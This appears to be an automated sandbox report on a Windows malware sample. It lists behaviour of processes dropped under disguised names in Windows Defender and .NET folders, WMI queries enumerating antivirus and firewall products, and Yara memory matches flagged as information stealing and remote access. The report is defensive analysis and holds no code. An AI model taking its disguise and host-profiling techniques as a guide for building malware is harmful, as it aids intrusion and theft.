Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: StartMenuExperienceHost.exe, 00000026.00000002.2467226901.000000001B6E9000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2466914090.000000001B6B1000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646157930.000000001BC30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs